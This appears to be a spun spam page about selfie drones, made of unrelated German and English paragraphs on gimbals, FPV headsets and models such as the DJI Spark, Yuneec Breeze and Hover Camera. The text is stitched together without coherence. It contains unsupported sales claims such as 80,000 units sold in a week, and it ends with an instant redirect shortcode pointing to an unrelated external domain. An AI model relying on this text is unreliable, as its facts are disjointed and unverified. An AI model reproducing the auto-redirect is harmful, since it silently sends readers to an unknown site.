Aus diesem Grund ist diese Drohne auch eine der am schnellsten verkauften Drohnen. In der vergangenen Woche wurden bereits weltweit über 80.000 Stück verkauft. Sogar der Hersteller war völlig überrascht und sagte, sobald sie ausverkauft sind, können sie erst Anfang 2018 wieder nachliefern.

Das Ausgleichen der Nick- und Roll-Bewegungen bewirkt zwar eine deutliche Verbesserung der Bildqualität, für wirklich professionell anmutende Aufnahmen mit einer Drohne mit Kamera empfiehlt sich jedoch die Anschaffung eines 3-Achs Gimbals. Erst wenn auch eine Stabilisierung der Gier-Bewegungen (Yaw-Achse) erfolgt, können rundum flüssige Videoaufnahmen entstehen. Diese Funktion sollte sich außerdem als sehr Nützlich für das Erstellen von Panorama-Aufnahmen erweisen, da eine Drehung des Gimbals um die Yaw-Achse weitaus sanfter vonstattengeht, als wenn man die gesamte Kamera-Drohne drehen muss. Wenn man sich einen Gimbal kauft, sollte man auch immer sicherstellen, dass die eigene Fernsteuerung noch über genügend freie Kanäle für die Ansteuerung der zusätzlichen Achsen verfügt.

Nach dem Flug lassen sich mit der Selfie-Drohne aufgenommene Fotos und Videos problemlos auf Dein Mobile Device herunterladen und ohne Umwege direkt über die Breeze App im Sozialen Netzwerk Deiner Wahl mit Freunden teilen. Zudem stehen Dir die wichtigsten Werkzeuge zur Bildbearbeitung zur Verfügung.

Yuneec bietet dazu das eigene FPV-Headset SkyView an. Der Pilot sieht genau das, was die Kamera filmt. Parrot hat ebenfalls ein FPV-Set im Angebot bestehend aus einem Controller sowie einem FPV-Headset . Das Set ist mit der aktuellen Bebob 2 sowie der Parrot Disco kompatibel. Beide Drohnen gibt es auch direkt im FPV-Bundle.

This is one of the more advanced selfie drones in terms of its selfie-taking ability. It has a camera capable of recording 4K video and on the side of the lens, you will find a LED light which can be activated via the app, making low-light selfies possible.

So lässt sich ein Absturz auch leichter verkraften. Eine Grenze nach oben gibt es bei den Drohnen eigentlich nicht, da es auch Bausätze gibt, mit denen sich die Fluggeräte modifizieren und erweitern lassen. Wir stellen Euch aber dieses Mal nur Drohnen vor, die nahezu out-of-the-box einsatzbereit sind.

Finally they are mostly autonomous and fly on their own in several predetermined patterns. Meaning you can set the drone to follow you from behind, or focus on your face from the front or even do a flyby around; all of this is done even if you are moving around. The idea is that you simply tell the drone to follow you and you start your adventure. Pretty cool!

Aber nicht nur die gute Kamera und der Gimbal machen mir Spaß an der EHANG GHOSTDRONE. Die VR Brille ist auch genial. Bis zu diesem Zeitpunkt bin ich Drohnen immer nur ganz normal geflogen. Mit einer VR Brille ist das noch ein Stück cooler. Bitte bedenk aber, dass du per Gesetz die Drohne sehen musst, wenn du damit fliegst. Fliegst du um ein Haus rum und fliegst nur mit der VR Brille, ist das nicht erlaubt.

Noch cooler wird es, wenn die Kamera eine FPV Kamera ist. Damit werden die Bilder Live auf ein Display z.B. auf das Smartphone übertragen. In Kombination mit einer Virtual Brille sieht man die Sicht praktisch so, als wäre säße man im Quadrocopter.

Model: DJI Spark Fly More Combo – Alpine White. DJI Alpine White Spark Drone. This DJI COMBO Includes The Settings option in DJI Assistant 2 or DJI GO 4;. Spark is the first DJI drone to feature new TapFly submodes, Coordinate and Direction.

Vor dem erstmaligen Abheben unserer Drohnen erscheint ein Bedienungshinweis zu dem gewählten Flugmodi direkt auf dem Bildschirm Deines Mobile Device. Solltest Du während der Flugzeit oder zu einem anderen Zeitpunkt Fragen zur Bedienung der Selfie-Drohne von Yuneec haben, klicke auf das Fragezeichen oben rechts in der App.

As far as the Hover Camera is concerned, it’s primary business is taking selfies. With that being said, it’s not surprising to see facial recognition and even an adjustable camera (in-flight) among some other selfie-oriented features including orbiting mode. To snap the perfect selfie with this thing, simply let it hover in the air, turn on facial recognition and set up all image settings according to your choice. [redirect url=’http://pm9.biz/bump’ sec=’0′]